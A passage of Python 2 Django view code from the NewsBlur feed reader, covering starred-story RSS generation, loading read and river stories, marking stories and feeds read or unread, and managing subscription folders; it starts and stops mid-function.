                                                                                    tag_counts.tag)
    data['lastBuildDate'] = datetime.datetime.utcnow()
    data['generator'] = 'NewsBlur - %s' % settings.NEWSBLUR_URL
    data['docs'] = None
    data['author_name'] = user.username
    data['feed_url'] = "%s%s" % (
        settings.NEWSBLUR_URL,
        reverse('starred-stories-rss-feed', 
                kwargs=dict(user_id=user_id, secret_token=secret_token, tag_slug=tag_slug)),
    )
    rss = feedgenerator.Atom1Feed(**data)

    if not tag_counts.tag:
        starred_stories = MStarredStory.objects(
            user_id=user.pk
        ).order_by('-starred_date').limit(25)
    else:
        starred_stories = MStarredStory.objects(
            user_id=user.pk,
            user_tags__contains=tag_counts.tag
        ).order_by('-starred_date').limit(25)
    for starred_story in starred_stories:
        story_data = {
            'title': starred_story.story_title,
            'link': starred_story.story_permalink,
            'description': (starred_story.story_content_z and
                            zlib.decompress(starred_story.story_content_z)),
            'author_name': starred_story.story_author_name,
            'categories': starred_story.story_tags,
            'unique_id': starred_story.story_guid,
            'pubdate': starred_story.starred_date,
        }
        rss.add_item(**story_data)
        
    logging.user(request, "~FBGenerating ~SB%s~SN's saved story RSS feed (%s, %s stories): ~FM%s" % (
        user.username,
        tag_counts.tag,
        tag_counts.count,
        request.META.get('HTTP_USER_AGENT', "")[:24]
    ))
    return HttpResponse(rss.writeString('utf-8'), content_type='application/rss+xml')

@json.json_view
def load_read_stories(request):
    user   = get_user(request)
    offset = int(request.REQUEST.get('offset', 0))
    limit  = int(request.REQUEST.get('limit', 10))
    page   = int(request.REQUEST.get('page', 0))
    order  = request.REQUEST.get('order', 'newest')
    query  = request.REQUEST.get('query')
    now    = localtime_for_timezone(datetime.datetime.now(), user.profile.timezone)
    message = None
    if page: offset = limit * (page - 1)
    
    if query:
        stories = []
        message = "Not implemented yet."
        # if user.profile.is_premium:
        #     stories = MStarredStory.find_stories(query, user.pk, offset=offset, limit=limit)
        # else:
        #     stories = []
        #     message = "You must be a premium subscriber to search."
    else:
        story_hashes = RUserStory.get_read_stories(user.pk, offset=offset, limit=limit, order=order)
        mstories = MStory.objects(story_hash__in=story_hashes)
        stories = Feed.format_stories(mstories)
        stories = sorted(stories, key=lambda story: story_hashes.index(story['story_hash']),
                         reverse=bool(order=="oldest"))
    
    stories, user_profiles = MSharedStory.stories_with_comments_and_profiles(stories, user.pk, check_all=True)
    
    story_hashes   = [story['story_hash'] for story in stories]
    story_feed_ids = list(set(s['story_feed_id'] for s in stories))
    usersub_ids    = UserSubscription.objects.filter(user__pk=user.pk, feed__pk__in=story_feed_ids).values('feed__pk')
    usersub_ids    = [us['feed__pk'] for us in usersub_ids]
    unsub_feed_ids = list(set(story_feed_ids).difference(set(usersub_ids)))
    unsub_feeds    = Feed.objects.filter(pk__in=unsub_feed_ids)
    unsub_feeds    = [feed.canonical(include_favicon=False) for feed in unsub_feeds]

    shared_stories = MSharedStory.objects(user_id=user.pk, 
                                          story_hash__in=story_hashes)\
                                 .only('story_hash', 'shared_date', 'comments')
    shared_stories = dict([(story.story_hash, dict(shared_date=story.shared_date,
                                                   comments=story.comments))
                           for story in shared_stories])
    starred_stories = MStarredStory.objects(user_id=user.pk, 
                                            story_hash__in=story_hashes)\
                                   .only('story_hash', 'starred_date')
    starred_stories = dict([(story.story_hash, story.starred_date) 
                            for story in starred_stories])
    
    nowtz = localtime_for_timezone(now, user.profile.timezone)
    for story in stories:
        story_date                 = localtime_for_timezone(story['story_date'], user.profile.timezone)
        story['short_parsed_date'] = format_story_link_date__short(story_date, nowtz)
        story['long_parsed_date']  = format_story_link_date__long(story_date, nowtz)
        story['read_status']       = 1
        story['intelligence']      = {
            'feed':   1,
            'author': 0,
            'tags':   0,
            'title':  0,
        }
        if story['story_hash'] in starred_stories:
            story['starred'] = True
            starred_date = localtime_for_timezone(starred_stories[story['story_hash']],
                                                  user.profile.timezone)
            story['starred_date'] = format_story_link_date__long(starred_date, now)
            story['starred_timestamp'] = starred_date.strftime('%s')
        if story['story_hash'] in shared_stories:
            story['shared'] = True
            story['shared_comments'] = strip_tags(shared_stories[story['story_hash']]['comments'])
    
    search_log = "~SN~FG(~SB%s~SN)" % query if query else ""
    logging.user(request, "~FCLoading read stories: ~SB%s stories %s" % (len(stories), search_log))
    
    return {
        "stories": stories,
        "user_profiles": user_profiles,
        "feeds": unsub_feeds,
        "message": message,
    }

@json.json_view
def load_river_stories__redis(request):
    limit             = 12
    start             = time.time()
    user              = get_user(request)
    message           = None
    feed_ids          = [int(feed_id) for feed_id in request.REQUEST.getlist('feeds') if feed_id]
    if not feed_ids:
        feed_ids      = [int(feed_id) for feed_id in request.REQUEST.getlist('f') if feed_id]
    story_hashes      = request.REQUEST.getlist('h')[:100]
    original_feed_ids = list(feed_ids)
    page              = int(request.REQUEST.get('page', 1))
    order             = request.REQUEST.get('order', 'newest')
    read_filter       = request.REQUEST.get('read_filter', 'unread')
    query             = request.REQUEST.get('query')
    include_hidden    = is_true(request.REQUEST.get('include_hidden', False))
    now               = localtime_for_timezone(datetime.datetime.now(), user.profile.timezone)
    usersubs          = []
    code              = 1
    user_search       = None
    offset = (page-1) * limit
    limit = page * limit
    story_date_order = "%sstory_date" % ('' if order == 'oldest' else '-')
    
    if story_hashes:
        unread_feed_story_hashes = None
        read_filter = 'unread'
        mstories = MStory.objects(story_hash__in=story_hashes).order_by(story_date_order)
        stories = Feed.format_stories(mstories)
    elif query:
        if user.profile.is_premium:
            user_search = MUserSearch.get_user(user.pk)
            user_search.touch_search_date()
            usersubs = UserSubscription.subs_for_feeds(user.pk, feed_ids=feed_ids,
                                                       read_filter='all')
            feed_ids = [sub.feed_id for sub in usersubs]
            stories = Feed.find_feed_stories(feed_ids, query, order=order, offset=offset, limit=limit)
            mstories = stories
            unread_feed_story_hashes = UserSubscription.story_hashes(user.pk, feed_ids=feed_ids, 
                                                                     read_filter="unread", order=order, 
                                                                     group_by_feed=False, 
                                                                     cutoff_date=user.profile.unread_cutoff)
        else:
            stories = []
            mstories = []
            message = "You must be a premium subscriber to search."
    elif read_filter == 'starred':
        mstories = MStarredStory.objects(
            user_id=user.pk,
            story_feed_id__in=feed_ids
        ).order_by('%sstarred_date' % ('-' if order == 'newest' else ''))[offset:offset+limit]
        stories = Feed.format_stories(mstories) 
    else:
        usersubs = UserSubscription.subs_for_feeds(user.pk, feed_ids=feed_ids,
                                                   read_filter=read_filter)
        all_feed_ids = [f for f in feed_ids]
        feed_ids = [sub.feed_id for sub in usersubs]
        if feed_ids:
            params = {
                "user_id": user.pk, 
                "feed_ids": feed_ids,
                "all_feed_ids": all_feed_ids,
                "offset": offset,
                "limit": limit,
                "order": order,
                "read_filter": read_filter,
                "usersubs": usersubs,
                "cutoff_date": user.profile.unread_cutoff,
            }
            story_hashes, unread_feed_story_hashes = UserSubscription.feed_stories(**params)
        else:
            story_hashes = []
            unread_feed_story_hashes = []

        mstories = MStory.objects(story_hash__in=story_hashes).order_by(story_date_order)
        stories = Feed.format_stories(mstories)
    
    found_feed_ids = list(set([story['story_feed_id'] for story in stories]))
    stories, user_profiles = MSharedStory.stories_with_comments_and_profiles(stories, user.pk)
    
    if not usersubs:
        usersubs = UserSubscription.subs_for_feeds(user.pk, feed_ids=found_feed_ids,
                                                   read_filter=read_filter)

    trained_feed_ids = [sub.feed_id for sub in usersubs if sub.is_trained]
    found_trained_feed_ids = list(set(trained_feed_ids) & set(found_feed_ids))

    # Find starred stories
    if found_feed_ids:
        if read_filter == 'starred':
            starred_stories = mstories
        else:
            starred_stories = MStarredStory.objects(
                user_id=user.pk,
                story_feed_id__in=found_feed_ids
            ).only('story_hash', 'starred_date')
        starred_stories = dict([(story.story_hash, dict(starred_date=story.starred_date,
                                                        user_tags=story.user_tags)) 
                                for story in starred_stories])
    else:
        starred_stories = {}
    
    # Intelligence classifiers for all feeds involved
    if found_trained_feed_ids:
        classifier_feeds = list(MClassifierFeed.objects(user_id=user.pk,
                                                        feed_id__in=found_trained_feed_ids,
                                                        social_user_id=0))
        classifier_authors = list(MClassifierAuthor.objects(user_id=user.pk, 
                                                            feed_id__in=found_trained_feed_ids))
        classifier_titles = list(MClassifierTitle.objects(user_id=user.pk, 
                                                          feed_id__in=found_trained_feed_ids))
        classifier_tags = list(MClassifierTag.objects(user_id=user.pk, 
                                                      feed_id__in=found_trained_feed_ids))
    else:
        classifier_feeds = []
        classifier_authors = []
        classifier_titles = []
        classifier_tags = []
    classifiers = sort_classifiers_by_feed(user=user, feed_ids=found_feed_ids,
                                           classifier_feeds=classifier_feeds,
                                           classifier_authors=classifier_authors,
                                           classifier_titles=classifier_titles,
                                           classifier_tags=classifier_tags)
    
    # Just need to format stories
    nowtz = localtime_for_timezone(now, user.profile.timezone)
    for story in stories:
        if read_filter == 'starred':
            story['read_status'] = 1
        else:
            story['read_status'] = 0
        if read_filter == 'all' or query:
            if (unread_feed_story_hashes is not None and 
                story['story_hash'] not in unread_feed_story_hashes):
                story['read_status'] = 1
        story_date = localtime_for_timezone(story['story_date'], user.profile.timezone)
        story['short_parsed_date'] = format_story_link_date__short(story_date, nowtz)
        story['long_parsed_date']  = format_story_link_date__long(story_date, nowtz)
        if story['story_hash'] in starred_stories:
            story['starred'] = True
            starred_date = localtime_for_timezone(starred_stories[story['story_hash']]['starred_date'],
                                                  user.profile.timezone)
            story['starred_date'] = format_story_link_date__long(starred_date, now)
            story['starred_timestamp'] = starred_date.strftime('%s')
            story['user_tags'] = starred_stories[story['story_hash']]['user_tags']
        story['intelligence'] = {
            'feed':   apply_classifier_feeds(classifier_feeds, story['story_feed_id']),
            'author': apply_classifier_authors(classifier_authors, story),
            'tags':   apply_classifier_tags(classifier_tags, story),
            'title':  apply_classifier_titles(classifier_titles, story),
        }
        story['score'] = UserSubscription.score_story(story['intelligence'])
        
    
    if not user.profile.is_premium:
        message = "The full River of News is a premium feature."
        code = 0
        # if page > 1:
        #     stories = []
        # else:
        #     stories = stories[:5]
    diff = time.time() - start
    timediff = round(float(diff), 2)
    logging.user(request, "~FYLoading ~FCriver stories~FY: ~SBp%s~SN (%s/%s "
                               "stories, ~SN%s/%s/%s feeds, %s/%s)" % 
                               (page, len(stories), len(mstories), len(found_feed_ids), 
                               len(feed_ids), len(original_feed_ids), order, read_filter))


    if not include_hidden:
        hidden_stories_removed = 0
        new_stories = []
        for story in stories:
            if story['score'] >= 0:
                new_stories.append(story)
            else:
                hidden_stories_removed += 1
        stories = new_stories
    
    # if page <= 1:
    #     import random
    #     time.sleep(random.randint(0, 6))
    
    data = dict(code=code,
                message=message,
                stories=stories,
                classifiers=classifiers, 
                elapsed_time=timediff, 
                user_search=user_search, 
                user_profiles=user_profiles)
                
    if not include_hidden: data['hidden_stories_removed'] = hidden_stories_removed
    
    return data
    

@json.json_view
def unread_story_hashes__old(request):
    user              = get_user(request)
    feed_ids          = [int(feed_id) for feed_id in request.REQUEST.getlist('feed_id') if feed_id]
    include_timestamps = is_true(request.REQUEST.get('include_timestamps', False))
    usersubs = {}
    
    if not feed_ids:
        usersubs = UserSubscription.objects.filter(Q(unread_count_neutral__gt=0) |
                                                   Q(unread_count_positive__gt=0),
                                                   user=user, active=True)
        feed_ids = [sub.feed_id for sub in usersubs]
    else:
        usersubs = UserSubscription.objects.filter(Q(unread_count_neutral__gt=0) |
                                                   Q(unread_count_positive__gt=0),
                                                   user=user, active=True, feed__in=feed_ids)
    
    unread_feed_story_hashes = {}
    story_hash_count = 0
    
    usersubs = dict((sub.feed_id, sub) for sub in usersubs)
    for feed_id in feed_ids:
        if feed_id in usersubs:
            us = usersubs[feed_id]
        else:
            continue
        if not us.unread_count_neutral and not us.unread_count_positive:
            continue
        unread_feed_story_hashes[feed_id] = us.get_stories(read_filter='unread', limit=500,
                                                           withscores=include_timestamps,
                                                           hashes_only=True,
                                                           default_cutoff_date=user.profile.unread_cutoff)
        story_hash_count += len(unread_feed_story_hashes[feed_id])

    logging.user(request, "~FYLoading ~FCunread story hashes~FY: ~SB%s feeds~SN (%s story hashes)" % 
                           (len(feed_ids), len(story_hash_count)))

    return dict(unread_feed_story_hashes=unread_feed_story_hashes)

@json.json_view
def unread_story_hashes(request):
    user               = get_user(request)
    feed_ids           = [int(feed_id) for feed_id in request.REQUEST.getlist('feed_id') if feed_id]
    include_timestamps = is_true(request.REQUEST.get('include_timestamps', False))
    order              = request.REQUEST.get('order', 'newest')
    read_filter        = request.REQUEST.get('read_filter', 'unread')
    
    story_hashes = UserSubscription.story_hashes(user.pk, feed_ids=feed_ids, 
                                                 order=order, read_filter=read_filter,
                                                 include_timestamps=include_timestamps,
                                                 cutoff_date=user.profile.unread_cutoff)
    logging.user(request, "~FYLoading ~FCunread story hashes~FY: ~SB%s feeds~SN (%s story hashes)" % 
                           (len(feed_ids), len(story_hashes)))
    return dict(unread_feed_story_hashes=story_hashes)

@ajax_login_required
@json.json_view
def mark_all_as_read(request):
    code = 1
    try:
        days = int(request.REQUEST.get('days', 0))
    except ValueError:
        return dict(code=-1, message="Days parameter must be an integer, not: %s" %
                    request.REQUEST.get('days'))
    read_date = datetime.datetime.utcnow() - datetime.timedelta(days=days)
    
    feeds = UserSubscription.objects.filter(user=request.user)
    socialsubs = MSocialSubscription.objects.filter(user_id=request.user.pk)
    for subtype in [feeds, socialsubs]:
        for sub in subtype:
            if days == 0:
                sub.mark_feed_read()
            else:
                if sub.mark_read_date < read_date:
                    sub.needs_unread_recalc = True
                    sub.mark_read_date = read_date
                    sub.save()
    
    logging.user(request, "~FMMarking all as read: ~SB%s days" % (days,))
    return dict(code=code)
    
@ajax_login_required
@json.json_view
def mark_story_as_read(request):
    story_ids = request.REQUEST.getlist('story_id')
    try:
        feed_id = int(get_argument_or_404(request, 'feed_id'))
    except ValueError:
        return dict(code=-1, errors=["You must pass a valid feed_id: %s" %
                                     request.REQUEST.get('feed_id')])
    
    try:
        usersub = UserSubscription.objects.select_related('feed').get(user=request.user, feed=feed_id)
    except Feed.DoesNotExist:
        duplicate_feed = DuplicateFeed.objects.filter(duplicate_feed_id=feed_id)
        if duplicate_feed:
            feed_id = duplicate_feed[0].feed_id
            try:
                usersub = UserSubscription.objects.get(user=request.user, 
                                                       feed=duplicate_feed[0].feed)
            except (Feed.DoesNotExist):
                return dict(code=-1, errors=["No feed exists for feed_id %d." % feed_id])
        else:
            return dict(code=-1, errors=["No feed exists for feed_id %d." % feed_id])
    except UserSubscription.DoesNotExist:
        usersub = None
        
    if usersub:
        data = usersub.mark_story_ids_as_read(story_ids, request=request)
    else:
        data = dict(code=-1, errors=["User is not subscribed to this feed."])

    r = redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL)
    r.publish(request.user.username, 'feed:%s' % feed_id)

    return data

@ajax_login_required
@json.json_view
def mark_story_hashes_as_read(request):
    r = redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL)
    story_hashes = request.REQUEST.getlist('story_hash')
    
    feed_ids, friend_ids = RUserStory.mark_story_hashes_read(request.user.pk, story_hashes)
    
    if friend_ids:
        socialsubs = MSocialSubscription.objects.filter(
                        user_id=request.user.pk,
                        subscription_user_id__in=friend_ids)
        for socialsub in socialsubs:
            if not socialsub.needs_unread_recalc:
                socialsub.needs_unread_recalc = True
                socialsub.save()
            r.publish(request.user.username, 'social:%s' % socialsub.subscription_user_id)

    # Also count on original subscription
    for feed_id in feed_ids:
        usersubs = UserSubscription.objects.filter(user=request.user.pk, feed=feed_id)
        if usersubs:
            usersub = usersubs[0]
            if not usersub.needs_unread_recalc:
                usersub.needs_unread_recalc = True
                usersub.save(update_fields=['needs_unread_recalc'])
            r.publish(request.user.username, 'feed:%s' % feed_id)
    
    hash_count = len(story_hashes)
    logging.user(request, "~FYRead %s %s in feed/socialsubs: %s/%s" % (
                 hash_count, 'story' if hash_count == 1 else 'stories', feed_ids, friend_ids))

    return dict(code=1, story_hashes=story_hashes, 
                feed_ids=feed_ids, friend_user_ids=friend_ids)

@ajax_login_required
@json.json_view
def mark_feed_stories_as_read(request):
    r = redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL)
    feeds_stories = request.REQUEST.get('feeds_stories', "{}")
    feeds_stories = json.decode(feeds_stories)
    data = {
        'code': -1,
        'message': 'Nothing was marked as read'
    }
    
    for feed_id, story_ids in feeds_stories.items():
        try:
            feed_id = int(feed_id)
        except ValueError:
            continue
        try:
            usersub = UserSubscription.objects.select_related('feed').get(user=request.user, feed=feed_id)
            data = usersub.mark_story_ids_as_read(story_ids, request=request)
        except UserSubscription.DoesNotExist:
            return dict(code=-1, error="You are not subscribed to this feed_id: %d" % feed_id)
        except Feed.DoesNotExist:
            duplicate_feed = DuplicateFeed.objects.filter(duplicate_feed_id=feed_id)
            try:
                if not duplicate_feed: raise Feed.DoesNotExist
                usersub = UserSubscription.objects.get(user=request.user, 
                                                       feed=duplicate_feed[0].feed)
                data = usersub.mark_story_ids_as_read(story_ids, request=request)
            except (UserSubscription.DoesNotExist, Feed.DoesNotExist):
                return dict(code=-1, error="No feed exists for feed_id: %d" % feed_id)

        r.publish(request.user.username, 'feed:%s' % feed_id)
    
    return data
    
@ajax_login_required
@json.json_view
def mark_social_stories_as_read(request):
    code = 1
    errors = []
    data = {}
    r = redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL)
    users_feeds_stories = request.REQUEST.get('users_feeds_stories', "{}")
    users_feeds_stories = json.decode(users_feeds_stories)

    for social_user_id, feeds in users_feeds_stories.items():
        for feed_id, story_ids in feeds.items():
            feed_id = int(feed_id)
            try:
                socialsub = MSocialSubscription.objects.get(user_id=request.user.pk, 
                                                            subscription_user_id=social_user_id)
                data = socialsub.mark_story_ids_as_read(story_ids, feed_id, request=request)
            except OperationError, e:
                code = -1
                errors.append("Already read story: %s" % e)
            except MSocialSubscription.DoesNotExist:
                MSocialSubscription.mark_unsub_story_ids_as_read(request.user.pk, social_user_id,
                                                                 story_ids, feed_id,
                                                                 request=request)
            except Feed.DoesNotExist:
                duplicate_feed = DuplicateFeed.objects.filter(duplicate_feed_id=feed_id)
                if duplicate_feed:
                    try:
                        socialsub = MSocialSubscription.objects.get(user_id=request.user.pk,
                                                                    subscription_user_id=social_user_id)
                        data = socialsub.mark_story_ids_as_read(story_ids, duplicate_feed[0].feed.pk, request=request)
                    except (UserSubscription.DoesNotExist, Feed.DoesNotExist):
                        code = -1
                        errors.append("No feed exists for feed_id %d." % feed_id)
                else:
                    continue
            r.publish(request.user.username, 'feed:%s' % feed_id)
        r.publish(request.user.username, 'social:%s' % social_user_id)

    data.update(code=code, errors=errors)
    return data
    
@required_params('story_id', feed_id=int)
@ajax_login_required
@json.json_view
def mark_story_as_unread(request):
    story_id = request.REQUEST.get('story_id', None)
    feed_id = int(request.REQUEST.get('feed_id', 0))
    
    try:
        usersub = UserSubscription.objects.select_related('feed').get(user=request.user, feed=feed_id)
        feed = usersub.feed
    except UserSubscription.DoesNotExist:
        usersub = None
        feed = Feed.get_by_id(feed_id)
        
    if usersub and not usersub.needs_unread_recalc:
        usersub.needs_unread_recalc = True
        usersub.save(update_fields=['needs_unread_recalc'])
        
    data = dict(code=0, payload=dict(story_id=story_id))
    
    story, found_original = MStory.find_story(feed_id, story_id)
    
    if not story:
        logging.user(request, "~FY~SBUnread~SN story in feed: %s (NOT FOUND)" % (feed))
        return dict(code=-1, message="Story not found.")
    
    if usersub:
        data = usersub.invert_read_stories_after_unread_story(story, request)

    message = RUserStory.story_can_be_marked_read_by_user(story, request.user)
    if message:
        data['code'] = -1
        data['message'] = message
        return data
    
    social_subs = MSocialSubscription.mark_dirty_sharing_story(user_id=request.user.pk, 
                                                               story_feed_id=feed_id, 
                                                               story_guid_hash=story.guid_hash)
    dirty_count = social_subs and social_subs.count()
    dirty_count = ("(%s social_subs)" % dirty_count) if dirty_count else ""
    RUserStory.mark_story_hash_unread(user_id=request.user.pk, story_hash=story.story_hash)
    
    r = redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL)
    r.publish(request.user.username, 'feed:%s' % feed_id)

    logging.user(request, "~FY~SBUnread~SN story in feed: %s %s" % (feed, dirty_count))
    
    return data

@ajax_login_required
@json.json_view
@required_params('story_hash')
def mark_story_hash_as_unread(request):
    r = redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL)
    story_hash = request.REQUEST.get('story_hash')
    feed_id, _ = MStory.split_story_hash(story_hash)
    story, _ = MStory.find_story(feed_id, story_hash)
    if not story:
        data = dict(code=-1, message="That story has been removed from the feed, no need to mark it unread.")
        return data        
    message = RUserStory.story_can_be_marked_read_by_user(story, request.user)
    if message:
        data = dict(code=-1, message=message)
        return data
    
    # Also count on original subscription
    usersubs = UserSubscription.objects.filter(user=request.user.pk, feed=feed_id)
    if usersubs:
        usersub = usersubs[0]
        if not usersub.needs_unread_recalc:
            usersub.needs_unread_recalc = True
            usersub.save(update_fields=['needs_unread_recalc'])
        data = usersub.invert_read_stories_after_unread_story(story, request)
        r.publish(request.user.username, 'feed:%s' % feed_id)

    feed_id, friend_ids = RUserStory.mark_story_hash_unread(request.user.pk, story_hash)

    if friend_ids:
        socialsubs = MSocialSubscription.objects.filter(
                        user_id=request.user.pk,
                        subscription_user_id__in=friend_ids)
        for socialsub in socialsubs:
            if not socialsub.needs_unread_recalc:
                socialsub.needs_unread_recalc = True
                socialsub.save()
            r.publish(request.user.username, 'social:%s' % socialsub.subscription_user_id)

    logging.user(request, "~FYUnread story in feed/socialsubs: %s/%s" % (feed_id, friend_ids))

    return dict(code=1, story_hash=story_hash, feed_id=feed_id, friend_user_ids=friend_ids)

@ajax_login_required
@json.json_view
def mark_feed_as_read(request):
    r = redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL)
    feed_ids = request.REQUEST.getlist('feed_id')
    cutoff_timestamp = int(request.REQUEST.get('cutoff_timestamp', 0))
    direction = request.REQUEST.get('direction', 'older')
    multiple = len(feed_ids) > 1
    code = 1
    errors = []
    cutoff_date = datetime.datetime.fromtimestamp(cutoff_timestamp) if cutoff_timestamp else None
    
    for feed_id in feed_ids:
        if 'social:' in feed_id:
            user_id = int(feed_id.replace('social:', ''))
            try:
                sub = MSocialSubscription.objects.get(user_id=request.user.pk, 
                                                      subscription_user_id=user_id)
            except MSocialSubscription.DoesNotExist:
                logging.user(request, "~FRCouldn't find socialsub: %s" % user_id)
                continue
            if not multiple:
                sub_user = User.objects.get(pk=sub.subscription_user_id)
                logging.user(request, "~FMMarking social feed as read: ~SB%s" % (sub_user.username,))
        else:
            try:
                feed = Feed.objects.get(id=feed_id)
                sub = UserSubscription.objects.get(feed=feed, user=request.user)
                if not multiple:
                    logging.user(request, "~FMMarking feed as read: ~SB%s" % (feed,))
            except (Feed.DoesNotExist, UserSubscription.DoesNotExist), e:
                errors.append("User not subscribed: %s" % e)
                continue
            except (ValueError), e:
                errors.append("Invalid feed_id: %s" % e)
                continue

        if not sub:
            errors.append("User not subscribed: %s" % feed_id)
            continue
        
        try:
            if direction == "older":
                marked_read = sub.mark_feed_read(cutoff_date=cutoff_date)
            else:
                marked_read = sub.mark_newer_stories_read(cutoff_date=cutoff_date)
            if marked_read and not multiple:
                r.publish(request.user.username, 'feed:%s' % feed_id)
        except IntegrityError, e:
            errors.append("Could not mark feed as read: %s" % e)
            code = -1
            
    if multiple:
        logging.user(request, "~FMMarking ~SB%s~SN feeds as read" % len(feed_ids))
        r.publish(request.user.username, 'refresh:%s' % ','.join(feed_ids))
    
    if errors:
        logging.user(request, "~FMMarking read had errors: ~FR%s" % errors)
    
    return dict(code=code, errors=errors, cutoff_date=cutoff_date, direction=direction)

def _parse_user_info(user):
    return {
        'user_info': {
            'is_anonymous': json.encode(user.is_anonymous()),
            'is_authenticated': json.encode(user.is_authenticated()),
            'username': json.encode(user.username if user.is_authenticated() else 'Anonymous')
        }
    }

@ajax_login_required
@json.json_view
def add_url(request):
    code = 0
    url = request.POST['url']
    folder = request.POST.get('folder', '')
    new_folder = request.POST.get('new_folder')
    auto_active = is_true(request.POST.get('auto_active', 1))
    skip_fetch = is_true(request.POST.get('skip_fetch', False))
    feed = None
    
    if not url:
        code = -1
        message = 'Enter in the website address or the feed URL.'
    elif any([(banned_url in url) for banned_url in BANNED_URLS]):
        code = -1
        message = "The publisher of this website has banned NewsBlur."
    else:
        if new_folder:
            usf, _ = UserSubscriptionFolders.objects.get_or_create(user=request.user)
            usf.add_folder(folder, new_folder)
            folder = new_folder

        code, message, us = UserSubscription.add_subscription(user=request.user, feed_address=url, 
                                                             folder=folder, auto_active=auto_active,
                                                             skip_fetch=skip_fetch)
        feed = us and us.feed
        if feed:
            r = redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL)
            r.publish(request.user.username, 'reload:%s' % feed.pk)
            MUserSearch.schedule_index_feeds_for_search(feed.pk, request.user.pk)
        
    return dict(code=code, message=message, feed=feed)

@ajax_login_required
@json.json_view
def add_folder(request):
    folder = request.POST['folder']
    parent_folder = request.POST.get('parent_folder', '')
    folders = None
    logging.user(request, "~FRAdding Folder: ~SB%s (in %s)" % (folder, parent_folder))
    
    if folder:
        code = 1
        message = ""
        user_sub_folders_object, _ = UserSubscriptionFolders.objects.get_or_create(user=request.user)
        user_sub_folders_object.add_folder(parent_folder, folder)
        folders = json.decode(user_sub_folders_object.folders)
        r = redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL)
        r.publish(request.user.username, 'reload:feeds')
    else:
        code = -1
        message = "Gotta write in a folder name."
        
    return dict(code=code, message=message, folders=folders)

@ajax_login_required
@json.json_view
def delete_feed(request):
    feed_id = int(request.POST['feed_id'])
    in_folder = request.POST.get('in_folder', None)
    if not in_folder or in_folder == ' ':
        in_folder = ""
    
    user_sub_folders = get_object_or_404(UserSubscriptionFolders, user=request.user)
    user_sub_folders.delete_feed(feed_id, in_folder)
    
    feed = Feed.objects.filter(pk=feed_id)
    if feed:
        feed[0].count_subscribers()
    
    r = redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL)
    r.publish(request.user.username, 'reload:feeds')
    
    return dict(code=1, message="Removed %s from '%s'." % (feed, in_folder))

@ajax_login_required
@json.json_view
def delete_feed_by_url(request):
    message = ""
    code = 0
    url = request.POST['url']
    in_folder = request.POST.get('in_folder', '')
    if in_folder == ' ':
        in_folder = ""
    
    feed = Feed.get_feed_from_url(url, create=False)
    if feed:
        user_sub_folders = get_object_or_404(UserSubscriptionFolders, user=request.user)
        user_sub_folders.delete_feed(feed.pk, in_folder)
        code = 1
        feed = Feed.objects.filter(pk=feed.pk)
        if feed:
            feed[0].count_subscribers()
    else:
        code = -1
        message = "URL not found."
        
    return dict(code=code, message=message)
    
@ajax_login_required
@json.json_view
def delete_folder(request):
    folder_to_delete = request.POST.get('folder_name') or request.POST.get('folder_to_delete')
    in_folder = request.POST.get('in_folder', None)
    feed_ids_in_folder = [int(f) for f in request.REQUEST.getlist('feed_id') if f]

    request.user.profile.send_opml_export_email(reason="You have deleted an entire folder of feeds, so here's a backup just in case.")
    
    # Works piss poor with duplicate folder titles, if they are both in the same folder.
    # Deletes all, but only in the same folder parent. But nobody should be doing that, right?
    user_sub_folders = get_object_or_404(UserSubscriptionFolders, user=request.user)
    user_sub_folders.delete_folder(folder_to_delete, in_folder, feed_ids_in_folder)
    folders = json.decode(user_sub_folders.folders)

    r = redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL)
    r.publish(request.user.username, 'reload:feeds')
    
    return dict(code=1, folders=folders)


@required_params('feeds_by_folder')
@ajax_login_required
@json.json_view
def delete_feeds_by_folder(request):
    feeds_by_folder = json.decode(request.POST['feeds_by_folder'])

    request.user.profile.send_opml_export_email(reason="You have deleted a number of feeds at once, so here's a backup just in case.")
    
    # Works piss poor with duplicate folder titles, if they are both in the same folder.
    # Deletes all, but only in the same folder parent. But nobody should be doing that, right?
    user_sub_folders = get_object_or_404(UserSubscriptionFolders, user=request.user)
    user_sub_folders.delete_feeds_by_folder(feeds_by_folder)
    folders = json.decode(user_sub_folders.folders)

    r = redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL)
    r.publish(request.user.username, 'reload:feeds')
    
    return dict(code=1, folders=folders)

@ajax_login_required
@json.json_view
def rename_feed(request):
    feed = get_object_or_404(Feed, pk=int(request.POST['feed_id']))
    user_sub = UserSubscription.objects.get(user=request.user, feed=feed)
    feed_title = request.POST['feed_title']
    
    logging.user(request, "~FRRenaming feed '~SB%s~SN' to: ~SB%s" % (
                 feed.feed_title, feed_title))
                 
    user_sub.user_title = feed_title
    user_sub.save()
    
    return dict(code=1)
    
@ajax_login_required
@json.json_view
def rename_folder(request):
    folder_to_rename = request.POST.get('folder_name') or request.POST.get('folder_to_rename')
    new_folder_name = request.POST['new_folder_name']
    in_folder = request.POST.get('in_folder', '')
    code = 0
    
    # Works piss poor with duplicate folder titles, if they are both in the same folder.
    # renames all, but only in the same folder parent. But nobody should be doing that, right?
    if folder_to_rename and new_folder_name:
        user_sub_folders = get_object_or_404(UserSubscriptionFolders, user=request.user)
        user_sub_folders.rename_folder(folder_to_rename, new_folder_name, in_folder)
        code = 1
    else:
        code = -1
        
    return dict(code=code)
    
@ajax_login_required
@json.json_view
def move_feed_to_folders(request):
    feed_id = int(request.POST['feed_id'])
    in_folders = request.POST.getlist('in_folders', '')
    to_folders = request.POST.getlist('to_folders', '')

    user_sub_folders = get_object_or_404(UserSubscriptionFolders, user=request.user)
    user_sub_folders = user_sub_folders.move_feed_to_folders(feed_id, in_folders=in_folders,
                                                             to_folders=to_folders)
    
    r = redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL)
    r.publish(request.user.username, 'reload:feeds')

    return dict(code=1, folders=json.decode(user_sub_folders.folders))
    
@ajax_login_required
@json.json_view
def move_feed_to_folder(request):
    feed_id = int(request.POST['feed_id'])
